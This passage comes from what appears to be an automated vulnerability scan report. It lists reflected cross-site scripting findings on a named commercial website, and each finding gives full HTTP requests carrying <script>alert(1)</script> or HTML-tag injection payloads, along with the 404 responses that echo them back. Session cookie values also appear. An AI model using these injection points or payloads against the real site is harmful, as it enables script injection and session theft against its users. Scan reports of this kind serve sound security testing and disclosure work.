This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...f3214<a>f285eb5af96&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...f3214<a>f285eb5af96&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.171. http://www.resellerbase.com/adult/media-chat/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b74b8<script>alert(1)</script>f07e7420d7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2&b74b8<script>alert(1)</script>f07e7420d7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2&b74b8<script>alert(1)</script>f07e7420d7d=1 was not found on this server.</p>
...[SNIP]...

2.172. http://www.resellerbase.com/adult/media-chat/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f7f62<a>a7c9cc1581c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2f7f62<a>a7c9cc1581c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2f7f62<a>a7c9cc1581c was not found on this server.</p>
...[SNIP]...

2.173. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74283<script>alert(1)</script>46d21d49eeb324acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult74283<script>alert(1)</script>46d21d49eeb324acb/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult74283<script>alert(1)</script>46d21d49eeb324acb/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.174. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63f4f<script>alert(1)</script>4cfb4821deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult63f4f<script>alert(1)</script>4cfb4821deb/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult63f4f<script>alert(1)</script>4cfb4821deb/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.175. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34151<script>alert(1)</script>417a43aa28e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/34151<script>alert(1)</script>417a43aa28e?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/34151<script>alert(1)</script>417a43aa28e?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.176. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5da08<script>alert(1)</script>34a9075894bc7389b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/5da08<script>alert(1)</script>34a9075894bc7389b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/5da08<script>alert(1)</script>34a9075894bc7389b?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.177. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6087e<script>alert(1)</script>0d9de3ee9d98eb1dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult6087e<script>alert(1)</script>0d9de3ee9d98eb1dd/personals-dating/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult6087e<script>alert(1)</script>0d9de3ee9d98eb1dd/personals-dating/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.178. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81182<script>alert(1)</script>7930a2f80f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult81182<script>alert(1)</script>7930a2f80f8/personals-dating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult81182<script>alert(1)</script>7930a2f80f8/personals-dating/ was not found on this server.</p>
...[SNIP]...

2.179. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 326c8<script>alert(1)</script>be7e44b4ceab92f56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/personals-dating326c8<script>alert(1)</script>be7e44b4ceab92f56/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating326c8<script>alert(1)</script>be7e44b4ceab92f56/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.180. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3172c<script>alert(1)</script>9eec34ac8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating3172c<script>alert(1)</script>9eec34ac8e5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating3172c<script>alert(1)</script>9eec34ac8e5/ was not found on this server.</p>
...[SNIP]...

2.181. http://www.resellerbase.com/adult/personals-dating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7649<script>alert(1)</script>eb5444c9e7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/?e7649<script>alert(1)</script>eb5444c9e7e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/?e7649<script>alert(1)</script>eb5444c9e7e=1 was not found on this server.</p>
...[SNIP]...

2.182. http://www.resellerbase.com/adult/personals-dating/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 1ea0f<a>fadb779f922 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1ea0f<a>fadb779f922 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1ea0f<a>fadb779f922 was not found on this server.</p>
...[SNIP]...

2.183. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a49ef<script>alert(1)</script>ba394d72f1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adulta49ef<script>alert(1)</script>ba394d72f1b/personals-dating/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adulta49ef<script>alert(1)</script>ba394d72f1b/personals-dating/googlepr.php was not found on this server.</p>
...[SNIP]...

2.184. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 157de<script>alert(1)</script>9aa0d5e1c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating157de<script>alert(1)</script>9aa0d5e1c6/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating157de<script>alert(1)</script>9aa0d5e1c6/googlepr.php was not found on this server.</p>
...[SNIP]...

2.185. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a7fe6<script>alert(1)</script>3b9168099f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/googlepr.phpa7fe6<script>alert(1)</script>3b9168099f2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.phpa7fe6<script>alert(1)</script>3b9168099f2 was not found on this server.</p>
...[SNIP]...

2.186. http://www.resellerbase.com/adult/personals-dating/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload fb75d<a>cd19e4de9ee was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/googlepr.php?link_id=19fb75d<a>cd19e4de9ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.php?link_id=19fb75d<a>cd19e4de9ee was not found on this server.</p>
...[SNIP]...

2.187. http://www.resellerbase.com/adult/personals-dating/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4aee3<script>alert(1)</script>a2b8e49cbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/googlepr.php?4aee3<script>alert(1)</script>a2b8e49cbd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.php?4aee3<script>alert(1)</script>a2b8e49cbd4=1 was not found on this server.</p>
...[SNIP]...

2.188. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 603f5<script>alert(1)</script>9231a5dc3b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult603f5<script>alert(1)</script>9231a5dc3b1/personals-dating/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
